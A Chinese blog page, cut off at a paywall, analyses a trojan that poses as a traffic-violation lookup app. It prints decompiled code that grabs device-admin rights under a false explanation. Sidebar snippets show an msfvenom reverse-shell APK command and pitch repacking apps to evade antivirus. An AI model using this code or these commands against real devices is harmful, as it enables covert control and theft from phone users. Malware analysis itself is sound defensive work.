原创:违章查询.apk---android木马分析手记

最新推荐文章于 2024-08-08 08:29:33 发布
最新推荐文章于 2024-08-08 08:29:33 发布
阅读量2.2k 收藏 4
点赞数
分类专栏: Android 文章标签: 木马 android 分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013754902/article/details/53337222
版权
本文记录了一次对违章查询.apk的深入分析过程,揭示了这款应用如何伪装成正常软件,实则暗藏恶意行为,涉及Android木马的检测与防范策略。
摘要由CSDN通过智能技术生成
写在前面:前段时间的一个手机木马,一直没时间去分析。现在有点时间简单作了分析,虽然过了时效,但为了研究技术,还是放出来看看吧。大神自动跳过。
一、来源:
       朋友的手机上收到一条短信,冒充交警部门提示有违章的罚单未处理,详情请点击: http://url.cn/XXXX
点击后下载一名为“违章查询.apk”,安装后如下所示:

写在前面:前段时间的一个手机木马,一直没时间去分析。现在有点时间简单作了分析,虽然过了时效,但为了研究技术,还是放出来看看吧。大神自动跳过。
一、来源:
       朋友的手机上收到一条短信,冒充交警部门提示有违章的罚单未处理,详情请点击: http://url.cn/XXXX
点击后下载一名为“违章查询.apk”,安装后如下所示:

 点击运行后,出现以下提示:


上代码: 

     
     
     
    
      
  1.  public void a()
    2. 
      
  2.   {
         
    3. 
      
  3.     try
    4. 
      
  4.     {
         
    5. 
      
  5.       Object localObject = (DevicePolicyManager)getSystemService("device_policy");
    6. 
      
  6.       ComponentName localComponentName = new ComponentName(this, MyDeviceAdminReceiver.class);
    7. 
      
  7.       if (!((DevicePolicyManager)localObject).isAdminActive(localComponentName))
    8. 
      
  8.       {
         
    9. 
      
  9.         localObject = new Intent("android.app.action.ADD_DEVICE_ADMIN");
    10. 
      
  10.         ((Intent)localObject).putExtra("android.app.extra.DEVICE_ADMIN", localComponentName);
    11. 
      
  11.         ((Intent)localObject).putExtra("android.app.extra.ADD_EXPLANATION", "提高权限获取保护");
    12. 
      
  12.         startActivityForResult((Intent)localObject, 0);
    13. 
      
  13.         this.b.sendEmptyMessageDelayed(1, 2500L);
    14. 
      
  14.       }
    15. 
      
  15.       return;
    16. 
      
  16.     }
    17. 
      
  17.     catch (Exception localException)
    18. 
      
  18.     {
         
    19. 
      
  19.       localException.printStackTrace();
    20. 
      
  20.     }
    21. 
      
  21.   }
    22.

激活以后,会提示与设备不兼容,然后就界面消失了,桌面的图标也不见了。
但是,在后台确能看到一个进程和一个服务:cn.nzhjde.lzjuideaw:thee_second2_service3
上代码: 
      
      
      
    
       
  1.  public void handleMessage(Message paramMessage)
    2. 
       
  2.   {
          
    3. 
       
  3.     switch (paramMessage.what)
    4. 
       
  4.     {
          
    5. 
       
  5.     default: 
    6. 
       
  6.       return;
    7. 
       
  7.     case 0: 
    8. 
       
  8.       f.c(this.a);
    9. 
       
  9.       Toast.makeText(this.a,
    10.
最低0.47元/天 解锁文章
家有牛小
关注
专栏目录
车辆违章查询.apk
05-27
在手机上可以查询车辆违章查询。在手机上可以查询车辆违章查询
木马APP的简单分析(Android Killer分析)
dfdhxb995397的博客
11-01 683
本文作者:三星s7edge 一.此贴目的:分析一个木马APP样本的行为。—————————————————————————————————————————————————-二.分析步骤及结果: 文件名称:Project_Mod.apk MD5值: 773833c1e4632aaa6b000e891dc49d4b 文...
探索远程控制的新境界:AhMyth Android RAT
最新发布
gitblog_00905的博客
08-08 967
探索远程控制的新境界:AhMyth Android RAT AhMyth-Android-RATAndroid Remote Administration Tool项目地址:https://gitcode.com/gh_mirrors/ah/AhMyth-Android-RAT 在当今的数字化时代,安全测试和远程管理工具扮演着至关重要的角色。今天,我们来深入探讨一个独特而强大的开源项目——AhM...
Android车辆违章查询APP源代码.rar
07-10
Android编写的实用查询APP:车辆违章查询程序源代码,根据用户输入的车辆信息(车牌号、车架号、发动机号等),可查询违章信息,根据默认查询地城市id, 初始化查询项目,可以显示隐藏行驶证图示,根据城市的配置设置查询项目,可以设置/取消最大长度限制,程序为了在查询过程中避免穿透导致表单元素取得焦点,编写了专用的处理模块。如果违章记录较多,则循环添加列表项来显示 自定义adapter。
Android交通违章查询开发实例(三)(HttpClient+Jsoup+验证码识别)
weixin_30687811的博客
09-28 163
先有页面再有内容 转载于:https://www.cnblogs.com/chenjiajin/archive/2012/09/28/2706720.html
全国交通违章查询助手 _android_3.0
05-18
全国交通违章查询助手是一款车主必备工具,支持全国大多数城市交通违章信息查询;是目前覆盖城市最多,查询数据最稳定的违章查询软件;更多城市列表也将持续添加! 产品功能: 1.违章查询:只需按要求输入车辆相关信息,即可查询车辆违章信息,并提供交管部门咨询电话; 2.违章信息报告:包含违章时间、地点、违章类别、扣分和罚款处理、处理状态; 3.违章批量查询:支持多辆机动车违章查询,详细列出执法点地址和电话; 4.异地查询:支持查询异地违章信息,并提供违章处理地址。 更新内容: 1.更新全部城市违章查询机制 2.增加十多个城市的违章查询接口 3.修复产品BUG
DB33T828.6-2011社会单位消防安全标准化建设指南第6部分:仓储物流单位.pdf
10-30
2. 防火巡查制度:单位应设定防火巡查人员,每日进行巡查,同时可利用视频监控辅助,检查内容包括违章用火、人员车辆违章、消防设施状况等。 3. 员工职责:员工需遵守消防安全制度,每日进行岗位防火检查,防止违章...
易观-中国汽车线上用户数字行为专题分析2019 -2019.10.8-39页.pdf
04-08
- 数字化企业在汽车后市场的崛起:汽车后服务市场保持快速发展,数字化工具如违章查询、充电加油等应用用户规模不断增长,数字化程度提升。 3. 用户行为分析: - 用户购买决策的改变:线上汽车资讯平台成为用户...
违章查询完成工程---聚合数据
12-16
【标题】"违章查询完成工程---聚合数据"是一款基于Android Studio开发的移动应用程序,主要功能是为用户提供车辆违章信息查询服务。它采用先进的MVP(Model-View-Presenter)架构模式,结合Retrofit网络库和RxJava...
一个木马分析(一)
白菜有罪的专栏
03-02 912
文件MD5:130862496f0fd7a4d6dcb519a06f9f80 分析完毕之后大概的结论有: 1)将自身拷贝到其他文件夹中,然后删除自身 2)结束指定进程,启动宿主进程 3)向系统进程注入代码 4)写启动项注册表 5)下载文件 6)查询DNS信息
一次简单的分析手机APK病毒木马
aozhuo4755的博客
01-07 1654
写个笔记记录一下,起因是朋友在QQ上发了个连接叫我看看 安不安全,叫我帮他看看,反正在店里待着也没生意,那就顺便看看咯。 打开这个网址 会自动弹出下载一个名为OOXX的APK安装包。 起先我的思路是想先从这个网站下手!先搞定这个网站或者服务器吧, 然后我就去网站主页看了下。是一个网址缩短(变形)的网站。 那么我们给地址还原成真实地址,http://1...
Android项目源码汽车违章记录查询
07-29
Android项目源码汽车违章记录查询
手机远控apk木马/安卓远程木马-零开始网安知识点
2401_84915584的博客
06-17 1120
毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种主机的门户,
xposed框架的检测和反制
云守护的专栏
09-17 9042
转自:https://www.52pojie.cn/thread-691584-1-1.html https://blog.coderstory.cn/about-xposed/ 环境: win10 x64 使用的工具:apkdb & jeb 2.2.7 1.尝试加载xposed的类,如果能加载则表示已经安装了。 XposedHelpers类中存在fieldCache ...
手机木马远程控制复现
记录开发和安全学习过程中的点点滴滴
09-10 4610
本文章主要是进行一次测试吧,自己之前也没有进行过测试关于apk木马远控,最近事情也比较多,自己也就做一个简单的测试吧,后期会尝试使用自己的手机做一个真机测试。
小白尝试——在自己的apk中添加马子
qq_44918093的博客
05-15 2302
起因 昨天写了个hello world apk,今天突然想,能不能在里边注入小马子玩玩,说干就干,不务正业的我又开始啦 工具 kali(我装在VM里) apktool Java环境 开始 先生成个木马,输入 msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx(你的kali的IP地址) LPORT=5555 R>/root/m.apk(也有可能由于没有安装msf而进入失败,输入这个命令安装就好apt install metasplo
如何给apk安装包去毒,避免被识别为病毒和木马
05-29 8295
本文来源:安卓修改大师 如果您的应用经常被识别为病毒或者木马,将大大影响应用的推广,更影响您的收益。各种安卓平台的安全软件的监管规则越来越严格,您的应用可能一不小心就会进入病毒库,被识别为有害应用。有没有更好的办法来解决这个问题呢,通过部署安卓修改大师的随机打包防病毒系统,随机修改包名,签名和文件的特征码md5,并提供最新打包的应用分发给用户下载,以达到防毒的效果。大家请通过视频来了解随机打包防毒系统的功能。 第十五讲 如何给apk安装包去毒,避免被识别为病毒和木马 ...
一个简单的Android木马病毒的分析
热门推荐
Fly20141201. 的专栏
09-09 3万+
一、样本信息 文件名称: 一个安卓病毒木马.apk  文件大小:242867 byte   文件类型:application/jar   病毒名称:Android.Trojan.SMSSend.KS 样本MD5:05B009F8E6C30A1BC0A0F793049960BC   二、病毒行为分析 0x1. 静态注册Android
古道搜查网整站源码免费开源-全面信息查询服务
19. 交通违章查询交通违章信息,包括车辆违章记录查询等。 20. 其它查询:网站可能还提供其他类型的便民查询服务。 该套源码属于ASP源码-整站程序,适用于想快速搭建信息查询类网站的开发者。ASP(Active Server...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值